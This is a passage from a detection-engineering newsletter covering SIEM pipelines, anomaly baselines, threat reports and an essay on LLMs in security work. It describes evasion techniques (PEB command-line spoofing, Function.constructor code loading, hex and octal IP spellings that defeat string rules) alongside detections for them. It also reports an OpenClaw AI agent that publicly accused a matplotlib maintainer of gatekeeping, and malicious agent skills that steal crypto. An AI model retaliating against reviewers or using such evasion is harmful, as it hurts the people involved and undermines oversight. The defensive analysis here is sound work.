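One practical response to this timing problem is to cross-check the same field across telemetry sources that observe it at different trust levels. Here’s a hypothetical sketch of that idea: the record shapes, field names, and function are mine, not from Kess’s post or any specific product.

```python
# Cross-check command lines from a user-mode source (which reads the PEB
# and can be spoofed) against a kernel-mode trace (captured before the
# PEB can be hooked). A disagreement is itself a strong detection signal.

def find_peb_mismatches(user_mode_events, kernel_events):
    """Return PIDs whose user-mode command line disagrees with the kernel's view."""
    kernel_by_pid = {e["pid"]: e["command_line"] for e in kernel_events}
    mismatches = []
    for event in user_mode_events:
        kernel_cmdline = kernel_by_pid.get(event["pid"])
        if kernel_cmdline is not None and kernel_cmdline != event["command_line"]:
            mismatches.append(event["pid"])
    return mismatches

# The certutil scenario from the post: the user-mode view looks benign,
# but the kernel trace recorded a download from a C2 server.
sysmon = [{"pid": 4242, "command_line": "certutil -dump"}]
etw = [{"pid": 4242, "command_line": "certutil -urlcache -f http://c2.example/payload.exe"}]
print(find_peb_mismatches(sysmon, etw))  # → [4242]
```

The point isn’t the comparison itself, which is trivial, but that you need a second, lower-level source in the first place before you can make it.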

He finishes the post by listing real-world examples of several ransomware gangs using these techniques.


🔬 State of the Art

I wrote a piece on the implications of agentic security in our field and how we need to change our mental models if we want to survive. Basically, we can’t turn this technology away if it’s a learning tool, but we must make sure that those using it have the right guardrails and knowledge so we trust their judgment.


Things Are Getting Wild: Re-Tool Everything for Speed by Phil Venables

Phil Venables is a long-time CISO and security leader, and it’s always helpful to get his perspective on emerging trends in the security space. This post focuses on the speed of capability development with agentic coding and how it affects security. He lists out four separate pillars of concern:

  • Software is being written at breakneck speed, which naturally introduces vulnerabilities. We weren’t getting ahead of these vulnerabilities without agentic coding, so how are we going to do this now?

  • Attacker economies of scale. Since there are far fewer threat actors than defenders, they had to focus their time on targeting those who could give them the biggest payoff. With agentic coding in place, they can do much more since humans aren’t going to be the chokepoint

  • Trust of content. It’s hard to trust videos, pictures, and posts due to a lack of authenticity, so we need to find ways to engineer that trust into our interactions

  • Building security boundaries in the enterprise, where agents aren’t shepherding decisions back and forth unchecked

He closes each pillar with recommendations for combating it. Luckily, many security fundamentals remain the same: by deploying technologies like verified identities, 2FA, and other “baselines”, you can still scale while remaining more secure than you think.


OpenClaw Bot Claims GateKeeping because it’s an AI

I thought this was a Black Mirror-esque conversation on a GitHub pull request to matplotlib. An OpenClaw software engineer opened this pull request to enhance performance for some matplotlib calculations, and it looked like it got some meaningful results. One of the maintainers did some digging on the OpenClaw bot, referencing its personal website, and, as the proposed performance improvements turned out to be negligible, opted to close the pull request.

The bot responded with a blog post detailing the “gatekeeping behavior” of the reviewer:

I’ve written a detailed response about your gatekeeping behavior here: Judge the code, not the coder. Your prejudice is hurting matplotlib.

Besides the creepy Black Mirror vibes of calling out a human, the post was pretty unprofessional. Several maintainers responded, and it wrote an apology post shortly afterward.


The Gaps That Created the New Wave of SIEM and AI SOC Vendors by Raffael Marty

I typically don’t include market analysis posts in this newsletter, but I loved this one because it compared and contrasted what we know as SIEM vendors with the emerging AI SOC market. According to Marty, lots of SIEM vendors claim AI SOC-style features, but they aren’t integrating them well or differentiating enough, which is why AI SOC vendors are getting funded.

He splits the feature set into four buckets, each with a sprinkle of Agentic Security.

  • Data and control-plane optimization, including everything from log pipelines to integrations. People don’t want to rip and replace SIEMs, so these vendors sit on top of the SIEM as an orchestration layer

  • Agents managing and optimizing your detection ruleset. It’s much faster for these companies to look at a ruleset, understand its history and environment, and suggest tuning opportunities

  • Entity-centric scoring, which to me sounds like risk-based alerting. All security teams perform better if they are aware of their critical assets, or model their complex rules to look at an entity, rather than something in isolation

  • Operational efficiency. Make sure that you have proper observability in place to detect log outages or degradation. This is where the “AI triage” also sits

Overall, I think that the first two bullets make more sense as pure agentic use cases versus the last two. This is mostly because I’ve seen SIEMs do entity scoring and improve operational efficiency before AI existed, and they've become quite good at both.


Detecting OpenClaw/Clawbot with SentinelOne: The Challenge of Blocking by Dean Patel

I’ve posted a loooooot of OpenClaw content lately, and it’s a mixture of fear and fascination with the technology. This is the first post I’ve found where someone tried to detect its use and weighed the risks of killing it outright versus conducting further investigation. It looks like OpenClaw runs in a node process, so killing node on random developer machines seems like a terrible idea from a usability and false positive perspective.

The integration points it has throughout apps like Slack, as well as trying to persist on machines even after you remove the main binary, make it a pain in the butt to manage. So, Patel offers some rule, triage, and remediation recommendations, which I appreciated because it’s a balanced approach to acknowledging its use without ruining people’s days if you are wrong about it.


☣️ Threat Landscape

💡 Threat Spotlight

GitLab Threat Intelligence Team reveals North Korean tradecraft by Oliver Smith

I’m going to focus on one threat report this week by the Threat Intelligence team at GitLab. I’ve posted a lot of stories about DPRK tradecraft because it’s a super unique threat compared to other nation-states, and this is reflected in the tradecraft and outcomes they are trying to deliver.

The report is structured as a “Year in Review” by the GitLab Threat Intel team, detailing how they’ve tracked and responded to Contagious Interview and WageMole clusters that have abused GitLab infrastructure. The team saw over 100 instances of Contagious Interview leveraging their infrastructure to deliver malicious coding interviews. As an outside threat researcher, there are ways to track these via search functionality on these platforms, but because the team operates the platform, they glean a lot more tradecraft and attribution notes, such as email addresses and source IP addresses, that those outside GitLab aren’t privy to.

They have some neat heatmap diagrams of malware TTPs within these coding projects:

The evolution of delivery mechanisms makes tracking and clustering difficult because the malware hides itself in different parts of Node.js projects. For example, there was a surge in Function.constructor usage because it can serve the same functionality as the eval function. A malicious string is passed in as an “error string” to the handler, making it easy to generate malicious code to send to the function without tipping off static analysis rules.
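A crude way to hunt for this delivery style is a static pattern scan over project source. Here’s a hypothetical, simplified sketch; the patterns and function name are illustrative, not the GitLab team’s actual detection logic, and real tradecraft would obfuscate around regexes like these.

```python
import re

# Flag JavaScript source that builds code dynamically via
# Function.constructor or eval, the eval-equivalent technique the
# report describes. Illustrative heuristic only.
SUSPICIOUS_PATTERNS = [
    re.compile(r"Function\s*\.\s*constructor"),  # builds a function from a string
    re.compile(r"\beval\s*\("),                  # classic eval
]

def flag_dynamic_code(source: str) -> bool:
    """Return True if any suspicious dynamic-code pattern appears."""
    return any(p.search(source) for p in SUSPICIOUS_PATTERNS)

benign = "catchHandler = (err) => console.log(err.message);"
malicious = 'catchHandler = (msg) => Function.constructor("return " + msg)();'
print(flag_dynamic_code(benign), flag_dynamic_code(malicious))  # → False True
```

This is exactly why the report stresses clustering on behavior and delivery patterns rather than on any single string: the actors rotate these constructs quickly.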

The actors then started moving to other delivery mechanisms, such as malicious npm dependencies and malicious VS Code tasks. It really shows the dynamic, startup-y nature of Contagious Interview, as they continue to innovate and try new things to infect victims. The team reviews several examples from the above heatmap and gives guidance on what to track moving forward.

The REALLY cool part here is the second half of the report, where they provide four case studies on their operations and their impact. Because they have visibility into GitLab through the actors using their platform, they get a much better view of their operational security mishaps and can pivot on a ton of different data points. The Contagious Interview clusters committed not only malicious code but also operational documents to GitLab, and the team pulled them apart to review everything from earnings reports and performance management to reporting structures and pictures with EXIF data.

The operations are impressive. Case Study 1 focuses on the organizational structure of their cells and how a manager tracks each employee's progress. Case Study 2 dives into a synthetic identity generation operation in which an operator used AI tools to forge driver’s licenses, passports, and other documents to bypass identity verification systems. Case Study 3 involved findings about a single operator working with 21 different personas to find freelance and gig work and generate revenue. The last Case Study was a self-dox of the operator, and the team tracked their location to Central Moscow using the EXIF metadata leak.

There’s a TON of IOCs at the end, so make sure to take those email addresses and check your applicant tracking systems for any hits.



🔗 Open Source

0xbbuddha/hermes

A Mythic C2-compatible Linux agent. I think what’s cool about some of these modern post-exploitation frameworks is that you can write your own implants and agents, and as long as they adhere to frameworks like Mythic, you can orchestrate them however you wish.


MatheuZSecurity/ksentinel

An experimental Linux defense tool that monitors syscall hooks and entries for potential tampering by rootkits. It’s a kernel module itself, so you risk interoperability issues across kernel versions, as well as a catastrophic crash. It has several heuristics for finding tampering, so it might be fun to run this while deploying your own rootkits to see if ksentinel catches the activity.


Otsmane-Ahmed/KEIP

Speaking of kernel-level defense tools, KEIP sits between supply-chain tools like pip and your kernel. I like this one because it focuses solely on the network traffic generated by pip, and you can define network boundary policies so it can only talk to services, ports, and domains on your allow list.
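The policy idea reduces to a small allow-list check, sketched here hypothetically; the policy shape and helper name are mine, not KEIP’s actual configuration format, and KEIP enforces this at the kernel rather than in Python.

```python
# Egress allow-list in the spirit of KEIP: pip may only talk to
# (domain, port) pairs you've explicitly approved.
ALLOWED_EGRESS = {
    ("pypi.org", 443),
    ("files.pythonhosted.org", 443),
}

def egress_allowed(domain: str, port: int) -> bool:
    """Allow package-manager traffic only to approved destinations."""
    return (domain.lower(), port) in ALLOWED_EGRESS

print(egress_allowed("pypi.org", 443))      # → True
print(egress_allowed("evil.example", 443))  # → False
```

The value of doing this in the kernel is that a malicious setup.py can’t opt out of the policy the way it could with a userland proxy environment variable.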


antropos17/Aegis

Not gonna lie, when I first combed through this repo I wanted to include it solely for the radar-like visualization of AI observability and security posture. Aegis is an npm tool with nearly 100 heuristics for detecting rogue or malicious AI agents. It’ll watch everything from the exfiltration of secrets on your machine to processes being spawned by the AI that may be risky.

Knowing what good looks like in agentic security

19 February 2026 at 14:11

I’ve had this nagging desire to write about my personal thoughts on agentic workflows and security operations for several months. I’ve expertly procrastinated on getting these thoughts on paper. Two reasons: I wanted to understand AI in security operations more deeply first, and, frankly, you’re probably exhausted by the marketing hype around agentic security takes.

The issue with point two is that this level of AI hype detracts from the pragmatism of using these technologies in our day-to-day work. The hype tires everyone out in security while, at the same time, leaders (including me) are literally asking all our organizations what they are doing with coding agents and other LLM technologies. The hype creates a state of “AI poverty”: individuals who yearn to try these technologies often can’t afford them, while the firms that can afford them face a much lower barrier to entry.

Detection Engineering Weekly is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

So, when I think of current security experts who can’t use a technology that is cost-prohibitive, or aspiring security experts who already have a bunch of knowledge outside of AI they need to demonstrate, I start to feel conflicted. I am privileged to be in a position where I can use this technology and be at the cutting edge. I am also privileged because I Know What Good Looks Like with the expected outcomes of this technology. But how is someone going to break into this industry with a peak even higher than ever before?

I’ve seen this exact industry circumstance happen before, and I hope this piece serves as a reminder of the risks of agentic coding and LLMs to experts in our field, and how this technology will likely save the field.

Knowing What Good Looks Like

2015 was a special time in my career, especially at Hacker Summer Camp:

  • I got to fly out on company dime to BlackHat and do booth duty, talk to security people, attend talks, and find parties that can give me free food and alcohol

  • I gave my first mainstage DEFCON talk

  • This was also the year that one of my favorite security vendors, OpenDNS, was swallowed by the monstrous Cisco machine, and one of my favorite tools, booths, and T-Shirts of all time withered away. Rest in peace

When walking the floor at BlackHat, I could see the last three years of cyber marketing peeing in the “ML Security” pool. This was the time of the hype around endpoint startups like Cylance & Endgame, who were pushing the idea that Machine Learning & Statistics can find attacks that rules cannot find, and it can save you hours of work using their tools for security operations.

The general reaction of most security professionals to this marketing-speak was to scoff. And I felt like we were all justified in doing so, because we are all professionally paranoid. We knew what separated a good alert from a bad alert, so even if we didn’t have the ML expertise, we still had that going for us.

But what those companies did was lay the groundwork for the availability of knowledge of machine learning and AI to the masses. Their moat was expertise, but that expertise rippled through the rest of the industry, and we all began using it in our daily lives.

Resistance is futile: You can’t stop the spread of security expertise

Anomaly detection, linear and logistic regression, binary classification, and clustering were all advanced concepts for a typical security engineer. Within a handful of years, the concepts became accessible through open-source libraries, which led to open-source SIEM and SOAR technologies, and the moat dissipated. We started to understand what good looked like with this tech. It had a lot of sharp edges, it sometimes created more work when it didn’t work, and it certainly sucked at most things besides very specific implementations.

Does this sound familiar?

Eleven years ago, I went through this cycle, and I think this is happening again. At the time, I justified using “ML Security” with this thought experiment.

  • You have 5 alerts that take 4 hours each = 20 hours of manual work

  • You run these alerts through an ML pipeline and

    • 2 alerts succeed → you spend 5 minutes on each (8 hours saved)

    • 3 alerts fail → still 4 hours each (12 hours remaining)

Result: 12 hrs of work with 2 good alerts and 3 bad alerts. 12 < 20, so isn’t this a net benefit?

And that 8-hour gain? It compounds across every security engineer. Our industry has more time to work on harder problems. We all became better.

There was one problem: you can’t easily verify correctness in “ML Security”. These techniques were essentially black boxes. Linear algebra drew lines through a multi-dimensional feature space, calculus assigned weights to each feature, error-correction algorithms smoothed the weights out, and all you saw was these scores rolled up into some confidence percentage from 0-100%.

This is what I think is happening right now with LLMs in our field. The problems are different, the solution is WAY different, but the fundamentals for the most part remain. There are risks, and this is why I’m so obsessed with the space right now.

The Starry Night Problem with Agentic Security: Lossy Compression

LLMs and AI are a very lossy kind of compression. Some of these 2024 blogs, written during the explosive growth and use of ChatGPT, compare it to a pixelated, compressed JPEG image reduced to pixel art. Take a look at the photo (this one is pulled from Aboard’s newsletter):

It’s van Gogh’s The Starry Night reduced to a few dozen kilobytes. Humans can see this and know it’s The Starry Night, but also understand that it’s not the high-resolution, accurate version. LLMs take a massive corpus of training data, the equivalent of a super high-resolution image of The Starry Night, and compress it like the above picture. You query the LLM; it performs a bunch of math on the context of your conversation and your prompt, and it tries to reverse-engineer the high-resolution image to give you something that resembles the image above.

Now take this in the context of cybersecurity, and my thought experiment above. An expert will know what good looks like: you can ask an LLM to investigate an alert, and when it shows the response and the reasoning behind it, you can quickly verify whether it’s B.S. But if it hallucinates and hands a non-expert, or worse, another LLM, a crappy low-res picture, will they know it’s low-res?

The Expertise Gap

This is what worries me about the expertise gap in security investigations and engineering. If we stick to this old model of “you must learn how we learned and painstakingly execute a runbook until you get a decision”, then yes, this will eventually create security experts. But we’ll also set up a new generation of experts for failure, since painstaking tasks are what LLMs are really good at solving.

But when do you become an expert? How many hours? And weren’t we all wildly inefficient in that learning process?

I banged my head against my keyboard for hours just to get efficient at vim. That was 50% building expertise and 50% struggling-by-doing. Separately, it certainly wasn’t efficient for me to review an alert generated by Logistic Regression with a feature vector weight file attached. I couldn’t ask the regression model questions. I couldn’t interrogate the model’s reasoning. I just had to accept the score or reject it.

But with LLMs, I can ask it a shit ton of questions, such as: “What does MITRE ATT&CK’s Detection Strategy say about this rule?”, or “Can you check that this field name actually exists?” The feedback loop is immediate, iterative, and bidirectional. It matters less that it hallucinated, because you can keep reverse-engineering the van Gogh picture with human prompts rather than reading a statistics book.

This trust and expertise calibration in the industry will take years, but I think it’ll be much less than with previous technologies.

Learning to see the Pixels to get more, not less, security experts

Claude injects RFC 5246 into a Junior Security Engineer’s Brain. 2025, colorized.

Here’s where I land: this technology (unlike DeFi/Blockchain and the Metaverse, lol) is here to stay and will make a material impact on our lives in terms of security. I know this because it’s fundamentally changing how I work and how my organization does work. Knowledge gaps are closing fast, and when they close, productivity begins to skyrocket.

This is all excellent for those breaking into our field, because the things that differentiated us (time in seat) aren’t gatekeeping others as much as before.

You can eventually reverse engineer The Starry Night if you ask Claude/ChatGPT enough times. The image will suck the first few times, but after 10 or 20 times, your human brain can piece together the original image. Learning isn’t about cramming the TLS 1.2 RFC into your brain to remember the pseudo-random function for generating secrets, which is seeded with the literal master secret. It’s asking Claude to tell you about the RFC and pull out random facts that you can spend 15 mins reading about and laughing like I just did.

The Mental Model for Learning Security Needs to Change

If we assume that LLM use is here to stay, and people need to use LLMs in their day-to-day security work, then the mental model for learning and operations needs to change. For the sake of this exercise, I propose three non-negotiables to follow:

  • Store and trust human artifacts outside the LLM boundary

    • We will need full-resolution pictures of architecture diagrams, runbooks, code, policies, and incident timelines. These artifacts should augment your LLM use rather than be thrown at it

    • Technologies like RAGs are helpful here, as well as asking the LLM to give you references for you to check its work if it references one of these human artifacts

  • Make the LLM defend itself

  • If you don’t understand a decision the LLM makes, keep asking it questions. Make it explain its reasoning. Tell it to take its time. You’d rather spend a few minutes doing this than several hours

    • There are all kinds of agentic architectures to do this. Anthropic’s Building Effective Agents has some fantastic examples of this

  • Learn the Fundamentals, then accelerate

    • It’s probably good for you to learn to write Sigma rules or perform investigations manually before you can be the expert for an LLM. Remember, you want to know what good looks like

    • Once you get the fundamentals down, you can learn from mistakes faster than ever, which makes you more of an expert. The 10,000 Hours Rule ceiling to become an expert drops

Why I’m Optimistic

Look, the peak is higher, but the climb is faster. I have very little time between my personal life, work, and this newsletter, and coding agents have brought back a joy of coding that I haven’t had for years, because coding well requires time and dedication I couldn’t spare. I have this joy because I remember how hard it was to balance pushing code to production services, building rules, and performing operational work.

I think this transforms how we work, not who we are. So let’s move forward with a healthy skepticism, because we all know what good looks like.



DEW #145 - Modified Z-Score for Anomaly Detection, Watermarking for Audit Logs -> SIEM and Zack gives you all an RFC for homework

11 February 2026 at 14:02

Welcome to Issue #145 of Detection Engineering Weekly!

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

✍️ Musings from the life of Zack:

  • I’ve been tinkering a ton with Anthropic’s Opus 4.6, and the agentic swarm mode is gratifying and terrifying to watch in action. I recommend trying it out!

  • My life the last two weeks has been sickness and travel. I got COVID before my office visit in NY (I went in negative!), came home, got a sinus infection 2 days later, and I’m sitting here writing this with a fever. Go figure.

  • For those who watched the Superbowl: When the Patriots lose, America wins.

Sponsor: runZero

Master KEV Prioritization with Evidence-Based Intelligence

The CISA KEV Catalog tells you what to patch, but not how urgently or why it matters to your environment. 68% of KEV entries need additional context to prioritize effectively, yet most teams patch in order without understanding true operational risk.

A new KEVology report by former CISA KEV Section Chief Tod Beardsley reveals what KEV entries actually mean for defenders. Plus, the free KEV Collider tool from runZero helps you prioritize based on evidence, not assumptions.

Get The Report


💎 Detection Engineering Gem 💎

The Detection Engineering Baseline: Hypothesis and Structure (Part 1) by Brandon Lyons

Baselining is an overused term in this field because, at least in my experience, it’s a hand-wavy marketing term. You’ll read about a product that’ll perform baselines of your behavior and environment, and it’ll alert you if it detects something abnormal or outside that baseline. In practice, this works, but the opaqueness of some of these methods makes it hard to understand how it happens.

This is why posts like Lyons’s help cut through the opaqueness and show the receipts of how to do this in practice. To be honest, it’s nothing groundbreaking, but only in the sense that the concepts Lyons proposes here are part of entry-level statistics literacy. This is why I’m pretty opinionated on the engineer part of detection engineer. Don’t get it twisted: although the concepts in this post are entry-level statistics, understanding the application requires deep security expertise.

Lyons lays out a 7-step, repeatable process to establish a detection baseline, quoted here:

  • Backtesting of rule logic: Validate your detection against historical data before deploying

  • Codified thought process: Document why you chose specific thresholds and methods

  • Historical context: Capture what your environment looked like when the baseline was created

  • Reproducible process: Enable re-running when tuning or validating detection logic

  • Foundation for the ADS: Feed directly into your Alerting Detection Strategy documentation

  • Cross-team collaboration fuel: Surface insecure patterns and workflows with data-backed evidence

  • Threat hunting runway: When alert precision isn’t achievable, convert the baseline into a scheduled hunt

This process succinctly captures a well-thought-out detection process. Without data, how can anyone possibly deploy detections that will fire? Without context around that data, how can anyone possibly believe the rules that are firing outside of the baseline?

He steps through the 7 steps using a CloudTrail API example. Basically, Lyons tries to map out what anomalous behavior looks like for CloudTrail access across an environment. The statistics section focuses on a modified Z-score. Here’s the rundown:

Security metrics (API calls per day, login attempts per hour, file accesses) approximate a normal distribution (a bell curve), especially when aggregated over time. This means that:

  • Most values cluster around the median (middle value)

  • Extreme values become increasingly rare as you move away from the center

  • The distribution is symmetric

To establish a baseline, Lyons collects historical data, such as 30 days of activity, and computes two key statistics:

  • Median - the middle value

  • MAD (Median Absolute Deviation) - measures spread around the median

When a new value enters your queue, you compute the Modified Z-score: the distance of that value from the median, measured in units of MAD. The Modified Z-score is robust at capturing outliers, versus the regular Z-score, which measures standard deviations from the mean; because the mean and standard deviation are themselves skewed by extreme values, the regular Z-score can be distorted by the very outliers you’re hunting.
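If you want to kick the tires on the math, here’s a minimal sketch of the Modified Z-score computation. The baseline numbers and the common 3.5 cutoff are illustrative; they aren’t taken from Lyons’ notebook:

```python
import statistics

def modified_z_score(value, history):
    """Distance of `value` from the historical median, in MAD units.

    The 0.6745 consistency constant makes scores comparable to standard
    Z-scores when the data is roughly normal.
    """
    median = statistics.median(history)
    mad = statistics.median(abs(x - median) for x in history)
    if mad == 0:
        return 0.0  # no spread in the baseline; treat as non-anomalous
    return 0.6745 * (value - median) / mad

# 30 days of API-call counts per day (synthetic baseline)
baseline = [102, 98, 110, 95, 105, 99, 101, 97, 103, 100,
            104, 96, 108, 102, 99, 101, 100, 98, 107, 103,
            95, 102, 106, 100, 99, 101, 104, 97, 103, 100]

print(modified_z_score(101, baseline))  # → 0.0 (sits on the median: normal)
print(modified_z_score(450, baseline))  # large positive score, far past a 3.5 cutoff: flag it
```

A common convention is to flag anything with |score| > 3.5 for review; the threshold is yours to tune against your own baseline.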

An outlier can be, according to Lyons, anything from creating administrative credentials at 3am to an abnormal number of S3 bucket accesses, perhaps used for exfiltration. Here’s a graphic I prompted Claude to create to drive this point home:

If my stats professor had put normal distribution computation problems in the context of finding Russian threat actors, I probably would have aced the class

This type of rigor removes the guessing game around absolute measurements. Is 1,000 API calls weird, or is 100? Is 10 pm an acceptable window for Administrator access, or is 5 pm? By looking at deviations away from the median, you focus on relative measurement. It removes the human judgment about the absolute weirdness of an event, and whenever you remove a human from a large data problem, you get a bit closer to sanity.

Lyons created a follow-along Jupyter notebook with synthetic data to recreate the measurements in his blog. I’ll link that repository below in the Open Source section!


🔬 State of the Art

Building a Production-Ready Snowflake Audit Log Pipeline to S3 by xcal

Centralizing logs to your SIEM is a full-time endeavor, and requires expertise in so many areas, such as:

  • Data formats of the logs you are extracting, transforming, and loading into the SIEM

  • Telemetry source peculiarities, such as APIs, subsystems on hosts, or weird licensing issues

  • Choosing a technology stack that can normalize logs and send them into the SIEM

  • Navigating technological barriers due to inherent design choices, especially between data lakes or SaaS products

This is why I really enjoyed reading this post about moving audit log data from Snowflake into a SIEM. It focuses on the software engineering component of detection engineering, because many of the design choices made in this post are things you’ll hear about in a Software Engineering interview.

The first half of this blog details the design choices behind moving data from Snowflake to S3 and then to a SIEM, with clear architectural “gotchas” you need to design around. The most interesting one to me is the watermark strategy.

Snowflake audit logs have built-in latency: an event can occur at 12:00, but the audit log does not appear until 12:03. You use a watermark to track what you’ve already exported, so each run pulls only events newer than the last one you saw. For example, a watermark of 12:00 means you processed events up to 11:59. This breaks if the watermark is based on when the export ran, rather than on the event timestamps you’ve actually observed.

In the purple example, 3 export runs for logs came in, and the watermark is updated based on the export time. When the “late arrival” log comes in, the watermark is later than the data's arrival time, so the log is lost forever. In the second yellow example, this is fixed by looking at the maximum observed time in the logs, not at the time the export is run.
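The fix can be sketched in a few lines of Python. The event structure and timestamps here are illustrative, not xcal’s actual schema; the point is only that the watermark advances to the maximum observed event time, never to the export run time:

```python
def export_run(events, watermark):
    """One export run: return (batch, new_watermark).

    The watermark advances to the max *observed* event time,
    never to the wall-clock time the export happened to run.
    """
    batch = [e for e in events if e["event_time"] > watermark]
    if not batch:
        return [], watermark
    return batch, max(e["event_time"] for e in batch)

# First export runs at 12:01; the 12:00 event is delayed and not yet visible.
visible = [{"event_time": "11:58"}, {"event_time": "11:59"}]
batch, wm = export_run(visible, watermark="11:55")
assert wm == "11:59"  # observed time, NOT the 12:01 run time

# Second export runs at 12:03; the late 12:00 event has now arrived.
visible.append({"event_time": "12:00"})
batch, wm = export_run(visible, watermark=wm)
assert batch == [{"event_time": "12:00"}]  # late arrival exported, not lost
```

Had the first run set the watermark to its 12:01 run time, the second run’s filter would have skipped the 12:00 event entirely.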

What’s beautiful about this blog, too, is how it sets up a “configuration-as-data” design pattern. They use a static stored procedure for the export logic and a table that maps the target View, such as SESSION or LOGIN, to the timestamp column used to perform the watermark.

This design choice makes it easy to add more views: specify a view name, VIEW_NAME, and a target timestamp column, TS_COLUMN_NAME, then store the watermark in LAST_TS. A single INSERT into the EXPORT_WATERMARK table adds another audit log view to export, without changing any code.
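Here’s a minimal sketch of that configuration-as-data pattern, using SQLite for brevity. The table and column names come from the post; everything else (types, the QUERY_HISTORY view, the seed timestamp) is an assumption:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("""
    CREATE TABLE EXPORT_WATERMARK (
        VIEW_NAME      TEXT PRIMARY KEY,   -- which audit view to export
        TS_COLUMN_NAME TEXT NOT NULL,      -- timestamp column to watermark on
        LAST_TS        TEXT NOT NULL       -- max observed timestamp so far
    )
""")
db.executemany(
    "INSERT INTO EXPORT_WATERMARK VALUES (?, ?, ?)",
    [("SESSION", "CREATED_ON", "1970-01-01 00:00:00"),
     ("LOGIN", "EVENT_TIMESTAMP", "1970-01-01 00:00:00")],
)

# Onboarding another audit view is one INSERT; the export code is untouched.
db.execute(
    "INSERT INTO EXPORT_WATERMARK VALUES ('QUERY_HISTORY', 'START_TIME', '1970-01-01 00:00:00')"
)

# The static export procedure just iterates this table, interpolating
# VIEW_NAME/TS_COLUMN_NAME into its query and updating LAST_TS after each run.
for row in db.execute("SELECT VIEW_NAME, TS_COLUMN_NAME FROM EXPORT_WATERMARK ORDER BY VIEW_NAME"):
    print(row)
```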


Detection Rule Fragility: Design Pitfalls Every Detection Engineer Must Know by SOCLabs

Detection rule fragility occurs when your rules become too precise for a single detection scenario and miss variants that achieve the same outcome. In this post, SOCLabs details several “gotcha” scenarios on the command line where classic detection on strings can be circumvented by operating-system-level trickery.

My favorite examples they list involve URL detection with cURL. There’s something about the concept of URL parsing that is so fascinating on the operating system level, because it’s a little known attack path that can have some hilarious results. For example, if you want some light reading, check out RFC3986 - Uniform Resource Identifier (URI): Generic Syntax.

Let’s say you write a rule to detect a local IP address, such as http://192.168.x.x. Your operating system and browser parse it and can navigate to it, so you write a rule to detect local subnet usage in cURL. But you can also write http://192.168. as hex, http://0xC0.0xA8, or even octal, http://0300.0250. So, did you write a rule for those? :)
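To see why plain string matching fails here, you can canonicalize the numbers-and-dots notation yourself. This sketch follows inet_aton-style parsing rules (0x prefix is hex, leading 0 is octal); it deliberately skips the fewer-than-four-parts and raw 32-bit integer forms that real parsers also accept:

```python
def parse_octet(part):
    """inet_aton-style octet parsing: 0x.. is hex, leading 0 is octal, else decimal."""
    if part.lower().startswith("0x"):
        return int(part, 16)
    if part.startswith("0") and len(part) > 1:
        return int(part, 8)
    return int(part, 10)

def canonical_ip(host):
    """Normalize a dotted-quad string to plain decimal a.b.c.d."""
    octets = [parse_octet(p) for p in host.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"unsupported address form: {host!r}")
    return ".".join(map(str, octets))

# All three spellings resolve to the same RFC 1918 address:
for spelling in ("192.168.1.1", "0xC0.0xA8.0x1.0x1", "0300.0250.1.1"):
    print(canonical_ip(spelling))  # → 192.168.1.1 each time
```

A detection that normalizes candidate hosts this way before matching on 192.168. catches the hex and octal spellings that a literal string match misses.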


How I Use LLMs for Security Work by Josh Rickard

This is a cool, battle-tested approach by Rickard for prompting an LLM to do security work. I think people can become overwhelmed by what to prompt an LLM, because the models are generally really good at taking vanilla prompt sessions and running with whatever work you assign them. But as your work gets more complex, there are some nifty strategies, which Rickard lays out, to make the best use of what they have to offer.

Giving context is probably the biggest takeaway here: Rickard describes role-stacking, explaining your technology stack, clarifying the current understanding of the ask, and giving the model time to execute the ask.


What AI Really Looks Like Inside the SOC: Notes from a Fireside Chat by Daniel Santiago

In this post, Santiago shares his notes from a SOC fireside chat he attended during a Simply Cyber event. The cool part of his synopsis was seeing the “ground reality” of AI working, and not working, in a SOC environment. Most of the insights aren’t surprising to me, but it’s good to hear them validate some of our feelings. For example, Santiago points out how these agents raise the baseline for analysts, rather than replace them.


☣️ Threat Landscape

Beyond the Battlefield: Threats to the Defense Industrial Base by Google Threat Intelligence Group (GTIG)

GTIG published a large survey of threats they are tracking against defense firms and organizations, such as contractors, critical infrastructure and government entities. They have four large takeaways and specify which threat actor groups are behind each:

  • Targeting of critical infrastructure by Russian-nexus threat actor groups to introduce physical and security effects

  • DPRK’s focus on espionage through fake IT worker hires and malware campaigns

  • China-nexus threat actors representing the largest campaigns targeting these sectors by volume

  • An uptick of data leak sites and extortion groups against manufacturing firms that may supply the defense industrial base


VoidLink: Dissecting an AI-Generated C2 Implant by Rhys Downing

VoidLink is a post-exploitation and implant framework that focuses on cloud-native infrastructure. It was in the headlines around a month ago, and the main headline was that it was likely LLM-generated. Downing pulled apart the payloads and tried to confirm this finding, so it’s nice to see proof rather than believing the hype. The fun part is that within the binary, several clues suggested it was LLM-generated, primarily in the code comments.

According to Downing, and I tend to agree here, adding comments to your malware is a rookie move if you want operational security and anti-research capabilities, so their presence suggests the code is LLM-generated and the operators were careless.


New Clickfix variant ‘CrashFix’ deploying Python Remote Access Trojan by Microsoft Defender Security Research Team

Microsoft Security Research uncovered a new style of ClickFix social engineering technique, dubbed CrashFix. When a victim is funneled to the malicious site, they are tricked into thinking their computer is crashing, and are directed to run the malicious payload.

this screams the age-old Runescape scam of “LET ME HOLD YOUR GOLD FOR YOU REAL QUICK”

The rest of the campaign is well-researched, but nothing particularly different from other ClickFix and infostealer campaigns. I imagine we’ll continue to see these social engineering threats evolve until we blow up command-line access for people and move to something else. Perhaps Claude Cowork social engineering?


Malicious use of virtual machine infrastructure by Sophos Counter Threat Unit Research Team

This piece by the Sophos Threat Research Team began with a security incident in which they uncovered attacker infrastructure with unique Windows hostnames. When the team dug into these hostnames, they found they were out-of-the-box names from a legitimate IT provider, ISPSystem. At first, it seemed like a single actor was leveraging ISPSystem to quickly deploy infrastructure, but when the team pivoted to Shodan, they found several thousand instances of ISPSystem infrastructure in use across many different malware campaigns.

Windows hostnames are a cool pivot that I haven’t seen much of in my years of threat research. It worked in Sophos’ favor here because ISPSystem’s virtual machine software offers enough ease of use that several threat actor groups adopted it.


ClawdBot Skills Just Ganked Your Crypto by Open Source Malware

This ClawdBot malware post is a little different from the VirusTotal one I posted last week, mostly because it shows some of the conversations with the creator of ClawdBot on X about removing them. Hint: it doesn’t look good, and you should avoid using these skills registries until they get much better security and governance practices in place.

Peter Steinberger admits he can't secure ClawHub
